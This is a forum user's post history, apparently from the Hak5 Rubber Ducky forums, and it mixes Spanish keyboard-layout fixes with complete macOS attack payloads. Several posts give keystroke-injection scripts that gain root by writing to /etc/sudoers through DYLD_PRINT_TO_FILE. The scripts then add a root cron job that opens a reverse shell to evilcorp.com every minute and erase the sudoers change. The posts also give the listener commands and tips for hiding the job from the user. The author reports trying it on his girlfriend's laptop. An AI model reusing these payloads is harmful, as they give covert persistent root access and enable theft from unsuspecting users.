Matto
-
Posts
15 -
Joined
-
Last visited
Posts posted by Matto
-
-
Looks nice!
Thanks for sharing.
-
Oops, you got me there.
I managed to make a proper layout for my keyboard using other languages as reference, but it was all trial and error.
The backlash was one of the keys that was not working correctly, so I had to fix it.
I'm not sure if it will help, but these are the changes I made:
https://forums.hak5.org/index.php?/topic/36068-keyboard-layout-modified-spanish-keyboard-layout/
-
Nice! Let me know how it went :)
-
Good news!!
I've searching around and I found that «netcat does a terrible job emulating a tty», so as I stated before, arrows and key combinations don't work as expected.
Then I found a way better alternative to the payload that uses python to create the reverse shell and socat instead of netcat to listen for the connection.
This is the Ducky payload:
DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 200 STRING Terminal DELAY 200 ENTER DELAY 500 COMMAND n DELAY 300 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 100 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l; echo "* * * * * python -c \"import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')\" evilcorp.com 443") | crontab - ENTER DELAY 100 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 100 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER DELAY 100 COMMAND w DELAY 100 COMMAND qAnd in your server, to listen for the connection you have to run:
sudo socat `tty`,raw,echo=0 tcp-listen:443
NOTE: Mostly sure you don't have socat installed, but you can do it very easily via apt-get (if your server is Debian based Linux. I'm not sure if it's available in OS X via homebrew).
This method has a longer command to execute and is not as «elegant» as the previous, but it solves ALL of the problems, and when I say all, I mean that even the autocomplete with the TAB key works perfectly. It's just the same behaviour than an SSH connection. You can also press «Ctrl + C» and you won't drop the connection, it's going to send that command to the victim as expected :)
To exit, just press «Ctrl + D».
Same as before, it will try to reconnect every 60 seconds.
I hope this helps. I've tested it an works like a charm.
-
To disable it you just should run:
sudo crontab -e
In the victim's computer. This will open a text editor and you just have to remove only the last line which is the one that the script created. Then save and you're done.
-
Hope it works for you :)
I've tested in a couple of Macs by now, and everything works as expected.
-
Thanks!
The code I saw uses the .plist files to start the connection on reboot and repeat the execution of the script each 60 seconds, but I just find it way easier to do with crontab.
Yes, this makes it difficult to find, specially because it adds the cron task to root's crontab, so even if the user takes a look at his own cron list, he will see nothing (unless he is root) :)
Regarding the arrows: The problem is not with the payload (it works as intended :). The problem is with netcat once it's connected and I gain control manually (no longer using the ducky).
When the victim makes the connection to my server, from my terminal I can't edit his files using VIM or nano since when I open any file, I can't use the arrows to move around (weird symbols appear instead).
Same happens when I want to «borrow» a file from the victim. When I try to connect via FTP from his machine to my server, I write:
ftp myserver.com
And instead of asking for the username / password, the terminal goes blank and does not respond anymore, as if the connection was lost.
Maybe it's a netcat limitation to send some output and special keys (as the arrows) through the connection?
Do you know any way around this? I know setting an SSH server in the victim would be the best solution, but then the port 22 should be open in his router and pointing to his IP address...
I'm not sure if I'm making myself clear. I'm sorry, english is not my native language :)
Thanks!
-
This vulnerability is great!
I've just created a payload for a persistent reverse bash in OS X using it:
https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/
About visudo:
I've been testing a little, and it seems that nothing happens if you directly edit «/etc/sudoers», so what my script does is, once the payload was executed, just delete the last line of the file like this:
REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200
I tested this in my own Mac and it works ok. It's way simpler and faster than using visudo.
Hope it helps!
-
Ok, sorry for the delay. I'm back now.
One thing I forgot to tell you is that I'm using a Mac, so that may change things.
I've spent a little time fixing the layout for the Spanish Layout in Mac OS X, and now it works OK.
This is my Layout:
// Author: Midnitesnake // 01-11-2014 // LAYOUT_ESPANOL // Based from Italian Keymap // Thanks to Jaime.AlvarezdeAldecoa for patches // Characters fixed by DragsterPS // Fixes for Mac by Matto KEY_NON_US_100 = 100 ASCII_20 = KEY_SPACE // 32 ASCII_21 = KEY_1, MODIFIERKEY_SHIFT // 33 ! ASCII_22 = KEY_2, MODIFIERKEY_SHIFT // 34 ASCII_23 = KEY_3, MODIFIERKEY_RIGHT_ALT // 35 # ASCII_24 = KEY_4, MODIFIERKEY_SHIFT // 36 $ ASCII_25 = KEY_5, MODIFIERKEY_SHIFT // 37 % ASCII_26 = KEY_6, MODIFIERKEY_SHIFT // 38 & ASCII_27 = KEY_MINUS // 39 ASCII_28 = KEY_8, MODIFIERKEY_SHIFT // 40 ( ASCII_29 = KEY_9, MODIFIERKEY_SHIFT // 41 ) ASCII_2A = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT // 42 * ASCII_2B = KEY_RIGHT_BRACE // 43 + ASCII_2C = KEY_COMMA // 44 , ASCII_2D = KEY_SLASH // 45 ASCII_2E = KEY_PERIOD // 46 . ASCII_2F = KEY_7, MODIFIERKEY_SHIFT // 47 / ASCII_30 = KEY_0 // 48 0 ASCII_31 = KEY_1 // 49 1 ASCII_32 = KEY_2 // 50 2 ASCII_33 = KEY_3 // 51 3 ASCII_34 = KEY_4 // 52 4 ASCII_35 = KEY_5 // 53 5 ASCII_36 = KEY_6 // 54 6 ASCII_37 = KEY_7 // 55 7 ASCII_38 = KEY_8 // 56 8 ASCII_39 = KEY_9 // 57 9 ASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT // 58 : ASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT // 59 ; ASCII_3C = KEY_TILDE // 60 < ASCII_3D = KEY_0, MODIFIERKEY_SHIFT // 61 = ASCII_3E = KEY_TILDE, MODIFIERKEY_SHIFT // 62 > ASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT // 63 ? ASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT // 64 @ ASCII_41 = KEY_A, MODIFIERKEY_SHIFT // 65 A ASCII_42 = KEY_B, MODIFIERKEY_SHIFT // 66 B ASCII_43 = KEY_C, MODIFIERKEY_SHIFT // 67 C ASCII_44 = KEY_D, MODIFIERKEY_SHIFT // 68 D ASCII_45 = KEY_E, MODIFIERKEY_SHIFT // 69 E ASCII_46 = KEY_F, MODIFIERKEY_SHIFT // 70 F ASCII_47 = KEY_G, MODIFIERKEY_SHIFT // 71 G ASCII_48 = KEY_H, MODIFIERKEY_SHIFT // 72 H ASCII_49 = KEY_I, MODIFIERKEY_SHIFT // 73 I ASCII_4A = KEY_J, MODIFIERKEY_SHIFT // 74 J ASCII_4B = KEY_K, MODIFIERKEY_SHIFT // 75 K ASCII_4C = KEY_L, MODIFIERKEY_SHIFT // 76 L ASCII_4D = KEY_M, MODIFIERKEY_SHIFT // 77 M ASCII_4E = KEY_N, MODIFIERKEY_SHIFT // 78 N ASCII_4F = KEY_O, MODIFIERKEY_SHIFT // 79 O ASCII_50 = KEY_P, MODIFIERKEY_SHIFT // 80 P ASCII_51 = KEY_Q, MODIFIERKEY_SHIFT // 81 Q ASCII_52 = KEY_R, MODIFIERKEY_SHIFT // 82 R ASCII_53 = KEY_S, MODIFIERKEY_SHIFT // 83 S ASCII_54 = KEY_T, MODIFIERKEY_SHIFT // 84 T ASCII_55 = KEY_U, MODIFIERKEY_SHIFT // 85 U ASCII_56 = KEY_V, MODIFIERKEY_SHIFT // 86 V ASCII_57 = KEY_W, MODIFIERKEY_SHIFT // 87 W ASCII_58 = KEY_X, MODIFIERKEY_SHIFT // 88 X ASCII_59 = KEY_Y, MODIFIERKEY_SHIFT // 89 Y ASCII_5A = KEY_Z, MODIFIERKEY_SHIFT // 90 Z ASCII_5B = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT // 91 [ ASCII_5C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT // 92 \ ASCII_5D = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT // 93 ] ASCII_5E = KEY_EQUAL, MODIFIERKEY_SHIFT // 94 ^ ASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT // 95 _ // ascii 60, 96: accento grave, non mappato ASCII_61 = KEY_A // 97 a ASCII_62 = KEY_B // 98 b ASCII_63 = KEY_C // 99 c ASCII_64 = KEY_D // 100 d ASCII_65 = KEY_E // 101 e ASCII_66 = KEY_F // 102 f ASCII_67 = KEY_G // 103 g ASCII_68 = KEY_H // 104 h ASCII_69 = KEY_I // 105 i ASCII_6A = KEY_J // 106 j ASCII_6B = KEY_K // 107 k ASCII_6C = KEY_L // 108 l ASCII_6D = KEY_M // 109 m ASCII_6E = KEY_N // 110 n ASCII_6F = KEY_O // 111 o ASCII_70 = KEY_P // 112 p ASCII_71 = KEY_Q // 113 q ASCII_72 = KEY_R // 114 r ASCII_73 = KEY_S // 115 s ASCII_74 = KEY_T // 116 t ASCII_75 = KEY_U // 117 u ASCII_76 = KEY_V // 118 v ASCII_77 = KEY_W // 119 w ASCII_78 = KEY_X // 120 x ASCII_79 = KEY_Y // 121 y ASCII_7A = KEY_Z // 122 z ASCII_7B = KEY_QUOTE, MODIFIERKEY_RIGHT_ALT // 123 { ASCII_7C = KEY_1, MODIFIERKEY_RIGHT_ALT // 124 | ASCII_7D = KEY_BACKSLASH, MODIFIERKEY_RIGHT_ALT // 125 } ASCII_7E = KEY_SEMICOLON, MODIFIERKEY_RIGHT_ALT // 126 ~ ISO_8859_1_BA = KEY_NON_US_100 // 127 º // ascii 7E, 126: tilde, non mappato ISO_8859_1_E0 = KEY_QUOTE // 192 a grave ISO_8859_1_E8 = KEY_LEFT_BRACE // 232 e grave ISO_8859_1_E9 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT // 233 e acuta ISO_8859_1_EC = KEY_EQUAL // 236 i grave ISO_8859_1_F2 = KEY_SEMICOLON // 242 o grave ISO_8859_1_F9 = KEY_BACKSLASH // 249 u grave ISO_8859_1_F1 = KEY_SEMICOLON ISO_8859_1_D1 = KEY_SEMICOLON, MODIFIERKEY_SHIFTI hope it helps someone!
-
Hi! I'm new to the Rubber Ducky and to this community.
I've made a simple payload to create a reverse bash in an OS X target by using crontab.
I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session.
Anyway, this is my payload:
DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 300 STRING Terminal DELAY 300 ENTER DELAY 700 COMMAND n DELAY 500 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 200 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab - ENTER DELAY 200 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER COMMAND Q
What this does is:
- Open the terminal
- Magically grant sudo privileges (many thanks to V3sth4cks153 for this)
- Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP)
- Remove the newly added privileges to the current user in /etc/sudoers
- Close the terminal app
The whole execution takes around 5 seconds.
So now, all we have to do in our attacking machine is:
sudo nc -l -p 443
We wait one minute (max) and we're in with root privileges
Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it.
Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want.
I just tested it on my girlfriend's Macbook Air and it works flawlessly.
One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this?
Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect.
Hope you like it!
-
Well, that's a good question :)
I got my Ducky yesterday and it has the firmware that came with it. I don't know if I have a way to check it, but I will flash the «Twin Duck» firmware today, so I'll try again after.
I agree that letters with accents don't add much value to scrips, so don't worry. I don't think they're necessary.
I'll let you know how it went after flashing the new firmware, but it will have to wait until tomorrow because as a newbie in the forum, this is my last allowed post for today :p
Thanks again!
-
You rock, man!
The bad news is that I run this test using your layout:
STRING ! ENTER STRING " ENTER STRING # ENTER STRING $ ENTER STRING % ENTER STRING & ENTER STRING ( ENTER STRING ) ENTER STRING * ENTER STRING + ENTER STRING , ENTER STRING . ENTER STRING / ENTER STRING : ENTER STRING ; ENTER STRING < ENTER STRING = ENTER STRING > ENTER STRING ? ENTER STRING @ ENTER STRING [ ENTER STRING \ ENTER STRING ] ENTER STRING ^ ENTER STRING _ ENTER STRING { ENTER STRING | ENTER STRING } ENTER STRING ~ ENTER STRING º ENTER STRING \ ENTER STRING - ENTER STRING ´ ENTER STRING á ENTER STRING Á ENTER STRING é ENTER STRING É ENTER STRING í ENTER STRING Í ENTER STRING ó ENTER STRING Ó ENTER STRING ú ENTER STRING Ú ENTER STRING ñ ENTER STRING Ñ ENTERWhile compiling I got these errors:
Hak5 Duck Encoder 2.6.3 Loading File ..... [ OK ] Loading Keyboard File ..... [ OK ] Loading Language File ..... [ OK ] Loading DuckyScript ..... [ OK ] Char not found:ISO_8859_1_B4 Char not found:ISO_8859_1_E1 Char not found:ISO_8859_1_C1 Char not found:ISO_8859_1_C9 Char not found:ISO_8859_1_ED Char not found:ISO_8859_1_CD Char not found:ISO_8859_1_F3 Char not found:ISO_8859_1_D3 Char not found:ISO_8859_1_FA Char not found:ISO_8859_1_DA Char not found:ISO_8859_1_F1 Char not found:ISO_8859_1_D1 DuckyScript Complete..... [ OK ]
(I think it's because of the accents in the vocals and the «ñ»)
And the output was:
!"#$%&()*+,./:;º=ª?@[≤]¿_{|}¢<≤------> Blank space-----> Blank space-----> Blank space^-----> Blank space-----> Blank space-----> Blank space-----> Blank space-----> Blank space-----> Blank space-----> Blank space-----> Blank space-----> Blank space"Am I doing something wrong?
-
Hey! Good to know that someone did this. I was about to create my own profile.
The problem is that the link is dead. Can you please upload it again?
Maybe in http://pastebin.com/ or if you have a GitHub account, so it won't be deleted.
Thanks a lot!
[Payload] OS X Root SSH Backdoor
in Classic USB Rubber Ducky
Posted
Sad news :'-(